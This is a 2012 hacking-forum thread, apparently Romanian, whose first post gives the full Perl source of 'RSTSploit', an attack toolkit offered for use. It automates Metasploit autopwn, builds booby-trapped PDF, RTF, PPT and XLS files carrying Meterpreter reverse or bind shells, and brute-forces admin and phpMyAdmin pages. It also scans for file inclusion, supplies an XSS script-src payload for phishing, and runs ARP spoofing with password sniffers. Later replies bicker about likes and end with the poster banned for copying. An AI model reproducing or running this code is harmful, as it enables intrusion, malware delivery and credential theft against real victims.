darkston3e Posted March 12, 2012 Report Share Posted March 12, 2012 (edited) This tool uses 0day metasploit vulnerabilities ( plugins / modules ) made specially for RSTCENTER.COM coded in perl.Recomand: Use it on Backtrack 5, or RC1 *or higher* for best results.http://code.google.com/p/rstsploit/downloads/list ( contains the rest of the files )Pass for rar: rstcenter.com# --------------------------------------------------# RSTSploit ToolKit # --------------------------------------------------# Copyright © <2012> <DarkStone>## This program is distributed in the hope that it will be useful,# but WITHOUT ANY WARRANTY; without even the implied warranty of# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.#### RSTSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability# RSTsploit Toolkit Version 1.0# # Description :## [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service# [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin# [+]format infector - inject reverse & bind payload into file format# [+]phpmyadmin - Search Target phpmyadmin login page# [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF# [+]apache users - search server username directory (if use from apache webserver)# [+]Dir Bruter - brute target directory with wordlist# [+]admin finder - search admin & login page of target# [+]MLITM,XSS Phishing - Man Left In The Middle Attack# [+]MITM - Man In The Middle Attack# # About Author :# # Founder : DarkStone# Email : darkston3e@yahoo.com# Thanks To : Hippi & Cr0w for helping#!/usr/bin/perl# --------------------------------------------------# RSTSploit ToolKit # --------------------------------------------------# Copyright (C) <2012> <DarkStone>## This program is distributed in the hope that it will be useful,# but WITHOUT ANY WARRANTY; without even the implied warranty of# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.#### RSTSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability# RSTsploit Toolkit Version 1.0# # Description :## [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service# [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin# [+]format infector - inject reverse & bind payload into file format# [+]phpmyadmin - Search Target phpmyadmin login page# [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF# [+]apache users - search server username directory (if use from apache webserver)# [+]Dir Bruter - brute target directory with wordlist# [+]admin finder - search admin & login page of target# [+]MLITM,XSS Phishing - Man Left In The Middle Attack# [+]MITM - Man In The Middle Attack# # About Author :# # Founder : DarkStone# Email : darkston3e@yahoo.com# Thanks To : Hippi & Cr0w for helping# use Term::ANSIColor qw(:constants); use HTTP::Request; use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); $header = int rand (6); open (HDR, "hdr//$header.wsf"); @RHDR=<HDR>; $email = 'darkston3e@yahoo.com';print GREEN, "@RHDR", RESET;print "\n\n";print CYAN ")=-=-=-=[ RSTSploit Toolkit Version 1.0\n", RESET;print CYAN ")=-=-=-=[ Report Bug : $email\n", RESET;print "\n\n";print "\tID & Name\t\t Description\n";print "\t------------\t\t--------------\n";print "\t[1]AutoPWN\t\t Scan,Detect Target Service's And Exploit Automated\n";print "\t[2]Wmap\t\t\t Crawler,Scan Target Web Service\n";print "\t[3]Format Infector\t Inject Custom Payload Into File Formats\n";print "\t[4]PHPMyAdmin\t\t Scan PHPMyAdmin Page\n";print "\t[5]LFI\t\t\t Scan Local File Inclusion Vulnerability\n";print "\t[6]Apache User\t\t Scan Apache User's Directory\n";print "\t[7]Dir Bruter\t\t Brute Force Directory Of Target Site\n";print "\t[8]Admin Finder\t\t Scan Target Admin Page\n";print "\t[9]MLITM Attack\t\t Man Left In The Middle, XSS Phishing Attack\n";print "\t[10]MITM Attack\t\t Man In The Middle Attack\n"; print "\n"; print CYAN, UNDERLINE "wsf", RESET; print " > "; $selector = <STDIN>; chomp ($selector); if ($selector ==1){&autopwn} if ($selector ==2){&wmap} if ($selector ==3){&infector} if ($selector ==4){&phpmyadmin} if ($selector ==5){&lfi} if ($selector ==6){&apache} if ($selector ==7){&DBR} if ($selector ==8){&admin} if ($selector ==9){&MLITM} if ($selector ==10){&MITM}sub autopwn { print "\n"; print YELLOW, BOLD "[*]Scan Target Service's With NMAP\n", RESET; print YELLOW, BOLD "[*]Detect Target Service's Via Open Ports\n", RESET; print YELLOW, BOLD "[*]Launch All Exploit ...\n", RESET; print RED, BOLD, UNDERLINE "[*]Use From Bind Payload,So Not Need To The Valid IP Address\n\n", RESET; print CYAN, UNDERLINE "wsf:Autopwn", RESET; print " > Enter Target IP Address : "; $target_ip = <STDIN>; chomp ($target_ip); print BLUE, BOLD "[*]Your Target => $target_ip\n"; print "[*]Engine Started ...\n", RESET; if (-e "tmp//rstsploit_autopwn.rc"){system ("rm -rf tmp//rstsploit_autopwn.rc")} open (APF, ">>tmp//rstsploit_autopwn.rc"); print APF "workspace -d rstsploit\n"; print APF "workspace -a rstsploit\n"; print APF "db_nmap $target_ip\n"; print APF "db_autopwn -t -x -p -e\n"; close (APF); system ("msfconsole -r tmp//rstsploit_autopwn.rc"); exit;}sub wmap { print "\n"; print YELLOW, BOLD "[*]Scan WebServer & Version Of Target\n"; print "[*]Crawler Target WebSite\n"; print "[*]Scan Webdav & etc About Target Server & Site\n\n", RESET; print CYAN, UNDERLINE "wsf:Wmap", RESET; print " > Enter Your Target IP Address : "; $target_ip = <STDIN>; chomp ($target_ip); print BLUE, BOLD "[*]Your Target IP => $target_ip\n"; print "[*]Engine Started ...\n", RESET; sleep (2); if (-e "tmp//rstsploit_wmap.rc"){system ("rm -rf tmp//rstsploit_wmap.rc")} open (WMS, ">>tmp//rstsploit_wmap.rc"); print WMS "workspace -d rstsploit-wmap\n"; print WMS "workspace -a rstsploit-wmap\n"; print WMS "load wmap\n"; print WMS "sleep 3\n"; print WMS "wmap_targets -c\n"; print WMS "wmap_sites -a $target_ip\n"; print WMS "wmap_targets -t $target_ip\n"; print WMS "wmap_run -t\n"; print WMS "sleep 3\n"; print WMS "wmap_run -e\n"; close (WMS); system ("msfconsole -r tmp//rstsploit_wmap.rc"); exit;}sub infector { print "\n"; print "\tID & Format\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]PDF\t\t\t Adobe Flash Player [newfunction] Invalid Pointer Use\n"; print "\t[2]RTF\t\t\t Microsoft Word RTF [pFragments] Stack Buffer Overflow\n"; print "\t[3]PPT\t\t\t Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow\n"; print "\t[4]XLS\t\t\t Microsoft Excel Malformed FEATHEADER Record Vulnerability\n"; print "\t[5]VBP\t\t\t Microsoft Visual Basic VBP Buffer Overflow\n"; print "\t[6]EPS\t\t\t Adobe Illustrator CS4 v14.0.0\n"; print "\n"; print CYAN, UNDERLINE "wsf:Infector", RESET; print " > Enter The ID Of Format : "; $selector_2 = <STDIN>; chomp ($selector_2); if ($selector_2 ==1){$expl_name = "exploit/windows/fileformat/adobe_flashplayer_newfunction"} if ($selector_2 ==2){$expl_name = "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof"} if ($selector_2 ==3){$expl_name = "exploit/windows/fileformat/ms10_004_textbytesatom"} if ($selector_2 ==4){$expl_name = "exploit/windows/fileformat/ms09_067_excel_featheader"} if ($selector_2 ==5){$expl_name = "exploit/windows/fileformat/ms_visual_basic_vbp"} if ($selector_2 ==6){$expl_name = "exploit/windows/fileformat/adobe_illustrator_v14_eps"} print "\n"; print CYAN, UNDERLINE "wsf:Infector", RESET; print " > Enter Your IP Address (Use In Reverse Payload) : "; $ourip = <STDIN>; chomp ($ourip); print "\n"; print "\tID & Payload\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]Bind TCP\t\t Windows Meterpreter (Reflective Injection), Bind TCP Stager\n"; print "\t[2]Reverse TCP\t\t Windows Meterpreter (Reflective Injection), Reverse TCP Stager\n"; print "\t[3]DLL,Reverse\t\t Reflective Dll Injection, Reverse TCP Stager\n"; print "\t[4]DLL,Bind\t\t Reflective Dll Injection, Bind TCP Stager\n"; print "\n"; print CYAN, UNDERLINE "wsf:Infector", RESET; print " > Select Payload : "; $selector_3 = <STDIN>; chomp ($selector_3); if ($selector_3 ==1){$payload_name = "PAYLOAD=windows/meterpreter/bind_tcp"} if ($selector_3 ==2){$payload_name = "PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourip"} if ($selector_3 ==3){$payload_name = "PAYLOAD=windows/dllinject/reverse_tcp LHOST=$ourip"} if ($selector_3 ==4){$payload_name = "PAYLOAD=windows/dllinject/bind_tcp"} print "\n"; print "[!]-------[Information]-------[!]\n"; print "[!] Exploit : $expl_name\n"; print "[!] Payload : $payload_name\n"; print "[!] Location: /root/.msf4/data/exploits\n"; print "[!]---------------------------[!]\n"; print "\n"; sleep (1); system ("msfcli $expl_name $payload_name E"); print "\n"; print GREEN, BOLD "[*] Do You Want To Create Listener ? <y/n> : ", RESET; $les=<STDIN>; chomp ($les); if ($les =~ /y/){ system ("msfcli exploit/multi/handler $payload_name E");} else { print YELLOW, BOLD "[*]Thank You For Using rstsploit,Have Nice Time\n"; print "[*]Bye Bye\n", RESET;}}sub phpmyadmin { $res_code = "200"; print "\n"; print YELLOW, BOLD "[*]PHPMyAdmin Login Page Finder\n"; print "[*]Enter Target Address (ex : http://site.com)\n\n", RESET; print CYAN, UNDERLINE "wsf:PHPMyAdmin", RESET; print " > Enter Target Address : "; $target_add = <STDIN>; chomp ($target_add); print GREEN, BOLD "[*]Loading List ...\n", RESET; sleep (2); print GREEN, BOLD "[*]Scanning ...\n", RESET; open (PHPMYADMIN, "<scr//phpmyadmin.csv") or die "[-]Error,Can't Found 'phpmyadmin.csv' File!\n"; while (<PHPMYADMIN>){ $path = $_; chomp ($path); $url=$target_add.$path; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($res_code)){ print GREEN "[+] [FOUND] ..... $path\n", RESET; } else {print RED "[-] [ERROR] ..... $path\n", RESET;} } close(PHPMYADMIN); print "\n"; print "DONE.\n";}sub lfi { print "\n"; print YELLOW, BOLD "[*]Scan Local File Inclusion Vulnerability On Your Target\n"; print "[*]Can Be Bypass Some Web Application Firewall (WAF)\n"; print "[*]Enter Target (ex : http://site.com/index.php?page=)\n", RESET; print CYAN, UNDERLINE "wsf:LFI", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print "\n"; print YELLOW, BOLD "[*]Engine Started ...\n", RESET; sleep (2); print YELLOW, BOLD "[+]Scanning ...\n", RESET; print "\n"; open (LFI, "<scr//lfi.csv") or die "[-]Error,Can't Found 'lfi.csv' File!\n"; while (<LFI>){ $try = $_; chomp ($try); $url=$target_add.$try; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success && $response->content =~ /root:x:/){ print GREEN, BOLD "[+] [FOUND] $try\n", RESET; } else { print ""; } } close (LFI); print "\n"; print YELLOW, BOLD "[*]DONE.\n", RESET;}sub apache { $res_code = "200"; print "\n"; print YELLOW, BOLD "[!]Brute Apache Directory Of Users\n"; print "[!]Enter Target (ex : http://site.com)\n", RESET; print CYAN, UNDERLINE "wsf:Apache", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print YELLOW, BOLD "[*]Loading Users List ...\n", RESET; sleep (2); print YELLOW, BOLD "[*]Engine Started ...\n"; print "[*]Scanning ...\n", RESET; open (APACHE, "<scr//apache.csv") or die "[-]Error, Can't Found 'apache.csv' File!\n"; while (<APACHE>){ $user = $_; chomp ($user); $url=$target_add.$user; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($res_code)){ print GREEN, BOLD "[+][FOUND] ... $url\n", RESET; } else {print "";} } close (APACHE); print "\n"; print YELLOW, BOLD "[*]DONE.\n", RESET;}sub DBR { $code="2xx"; print "\n"; print YELLOW, BOLD "[*]Brute Target Directory With WordList\n"; print "[*]Enter Target Address (ex : http://site.com/)\n\n", RESET; print CYAN, UNDERLINE "wsf:DirBruter", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print BLUE, BOLD "\n[*]Loading WordList ...\n"; sleep (2); print "[*]Engine Started ...\n"; print "[*]Scanning ...\n", RESET; print "\n"; open (WORDLIST, "<scr//DBR.csv") or die "[-]Error,Can't Found 'DBR.csv' File!\n"; while (<WORDLIST>){ $wl=$_; chomp ($wl); $slash="/"; $url = $target_add.$slash.$wl; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($code)){ print GREEN "[+] [FOUND] ... $url\n", RESET; } else {print RED "[-] [ERROR] ... $url\n", RESET;} } close (WORDLIST); print "\n"; print YELLOW, BOLD "[*]DONE.\n";}sub admin { $res_code="200"; print YELLOW, BOLD "[*]Scan Admin/Login Page Of Your Target\n"; print "[*]Enter Target Address (ex : http://site.com)\n", RESET; print CYAN, UNDERLINE "wsf:AdminFinder", RESET; print " > Enter Your Target Address : "; $target_add = <STDIN>; chomp ($target_add); print BLUE, BOLD "[*]Loading Admin Page Name List ...\n"; sleep (2); print "[!]Engine Started ...\n"; print "[!]Scanning ...\n", RESET; print "\n"; open (ADMINS, "<scr//admins.csv") or die "[-]Error,Can't Found 'admins.csv' File!\n"; while (<ADMINS>){ $adminpath=$_; chomp ($adminpath); $url = $target_add.$adminpath; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success($res_code)){ print GREEN "[+] [FOUND] ... $url\n", RESET; } else {print RED "[-] [ERROR] ... $url\n", RESET;} } close (ADMINS); print "\n"; print YELLOW, BOLD "[*]DONE.\n", RESET;}sub MLITM { print "\n"; print RED BOLD "[*]Written by DarkStone\n"; print '[*]darkston3e@yahoo.com'; print "\n"; print YELLOW BOLD "[*]This is not an exploit tool, it's a payload tool.\n"; print "[*]Once you've found the exloit, and you're able to inject javascript,\n"; print "[*]just stick this in there as a script.\n"; print '[*]<script src="http://YOURIP/">', RESET; print "\n"; print BLUE BOLD "[*]Stoping Web Server ... ", RESET; system ("xterm -e service apache2 stop"); sleep (2); print BLUE BOLD "OK\n", RESET; print "\n"; print CYAN UNDERLINE "wsf:MLITM", RESET; print " > Press [ENTER] For Start XSS Phishing Attack : "; $enter = <STDIN>; system ("python scr//thebiz.py");}sub MITM { print "\n"; print YELLOW BOLD "[*]Man In The Middle Attack\n", RESET; print YELLOW BOLD "[*]Sniff Victim Information In Your Network\n", RESET; print YELLOW BOLD "[*]Enter Interface Name (ex : eth0 ,eth1 ,wlan0)\n", RESET; print CYAN UNDERLINE "wsf:MITM", RESET; print " > Enter Interface Name : "; $interface_name = <STDIN>; chomp ($interface_name); print CYAN UNDERLINE "wsf:MITM", RESET; print " > Enter Router IP Address : "; $router_ip = <STDIN>; chomp ($router_ip); print CYAN UNDERLINE "wsf:MITM", RESET; print " > Enter Target IP Address : "; $target_ip = <STDIN>; chomp ($target_ip); print "\n"; print "\tSniffers\t\t Description\n"; print "\t------------\t\t--------------\n"; print "\t[1]DSniffer\t\t Sniff All Passwords\n"; print "\t[2]Msgsnarf\t\t Sniff All Text Of Victim Messengers\n"; print "\t[3]Urlsnarf\t\t Sniff Victim Links\n"; print "\t[4]Driftnet\t\t Sniff Victim Images\n"; print "\n"; print CYAN UNDERLINE "msf:MITM", RESET; print " > Enter Selected Sniffer ID : "; $sniff_selector = <STDIN>; chomp ($sniff_selector); if ($sniff_selector ==1){$selected_sniffer="dsniff -i $interface_name"} if ($sniff_selector ==2){$selected_sniffer="msgsnarf -i $interface_name"} if ($sniff_selector ==3){$selected_sniffer="urlsnarf -i $interface_name"} if ($sniff_selector ==4){$selected_sniffer="driftnet -i $interface_name"} # ip forwarding section print "\n"; print BLUE BOLD "[*]IP Forwarding ... ", RESET; $p_forwarding = 'xterm -T "RSTSploit - Port Forwarding ..." -e "echo 1 > /proc/sys/net/ipv4/ip_forward"'; system ("$p_forwarding"); sleep (2); print BLUE BOLD "OK\n", RESET; print BLUE BOLD "[*]ARP Spoofing ... ", RESET; $arp_spoofing1 = "xterm -e arpspoof -i $interface_name -t $target_ip $router_ip &"; $arp_spoofing2 = "xterm -e arpspoof -i $interface_name -t $router_ip $target_ip &"; print BLUE BOLD "OK\n", RESET; system ("$arp_spoofing1"); sleep (1); system ("$arp_spoofing2"); sleep (1); system ("$selected_sniffer");}## RSTsploit Toolkit Version 1.0# Written By DarkStone# RSTSploit Project : https://www.rstcenter.com Edited March 12, 2012 by darkston3e Google code added 1 Quote Link to comment Share on other sites More sharing options...
darkston3e Posted March 12, 2012 Author Report Share Posted March 12, 2012 Asta este ultimul release care il fac pentru RST.Nici macar 1 like, nici macar 1 comment ( nu are sens ).Lumea a uitat sa aprecieze, am incercat de mai multe ori, si in loc de multumiri, am primit numai flame-uri. Quote Link to comment Share on other sites More sharing options...
cmiN Posted March 12, 2012 Report Share Posted March 12, 2012 (edited) Ai rabdare, in 10 ore de azi dimineata pana acum cine crezi ca apuca sa vada sau sa testeze asa ceva ?Oricum mie imi place cat de cat cum ai organizat codul desi mai mergea putin lucrat la partea de lizibilitate, dar arata mult mai bine decat majoritatea lucrurilor ce se posteaza pe aici.Stai linistit ca am si eu multe posturi in Python care nu au primit un gram de atentie sau pentru care chiar am muncit in special pentru anumite lucruri, iar cateva scripturi de cacat care le-am pus asa pur si simplu sa mai fac un thread doar ca sa ajut pe cineva cu o chestie au mult mai multe vizualizari si likeuri, dar nu o fac pe ipocritul sa spun ca ma deranjeaza, ci las acolo postul sa fie si sa vina in ajutorul celui ce cauta si are nevoie. De acest lucru mi-am dat seama demult si nu regret niciun efort deoarece in tot ce am facut a existat si un interes personal si chiar m-a ajutat "practica" asta.Asa ca, inainte sa spui ceea ce ai spus mai sus, mai gandeste-te o data si pleaca de la o "fundatie" bazata pe ideea ce tot ce faci faci pentru tine nu pentru altii, nu pentru rst si niciun efort nu e in zadar. Edited March 12, 2012 by cmiN Quote Link to comment Share on other sites More sharing options...
Nytro Posted March 12, 2012 Report Share Posted March 12, 2012 Sunt la munca si nu am putut sa ma uit peste el sa ma dau cu parerea, nu te mai purta copilareste, ca o "attention whore".Codul e frumos organizat, dar nu am timp sa il citesc sa vad exact despre ce e vorba, o sa ma uit diseara. Quote Link to comment Share on other sites More sharing options...
darkston3e Posted March 12, 2012 Author Report Share Posted March 12, 2012 @cmiN;Good point.. @Nytro;Ok, imi cer scuze, am fost putin cam recalcitrant cand m-am trezit si nu am vazut nici macar 1 like sau un comment ( dar acum realizez ca nu foarte multe persoane folosesc astfel de creatii pentru ca ii depaseste ).P.S: This script is not for dummies Quote Link to comment Share on other sites More sharing options...
iBebe Posted March 12, 2012 Report Share Posted March 12, 2012 Daca ai facut asta doar ca sa pui by drakstone acolo sau doar pentru atentie degeaba ai facut.Ar trebui un warn pentru dublupost. Quote Link to comment Share on other sites More sharing options...
Active Members Fi8sVrs Posted March 12, 2012 Active Members Report Share Posted March 12, 2012 copie 1 Quote Link to comment Share on other sites More sharing options...
Nytro Posted March 12, 2012 Report Share Posted March 12, 2012 Mersi, ban permanent. Quote Link to comment Share on other sites More sharing options...
cmiN Posted March 12, 2012 Report Share Posted March 12, 2012 Wtf nici nu-mi trecuse prin gand.Increderea asta -,-. Quote Link to comment Share on other sites More sharing options...
iBebe Posted March 12, 2012 Report Share Posted March 12, 2012 Pfff.. aici trebuia python3 sa vina cu o intrebare de a lui, sa se faca putin de cacao. Quote Link to comment Share on other sites More sharing options...
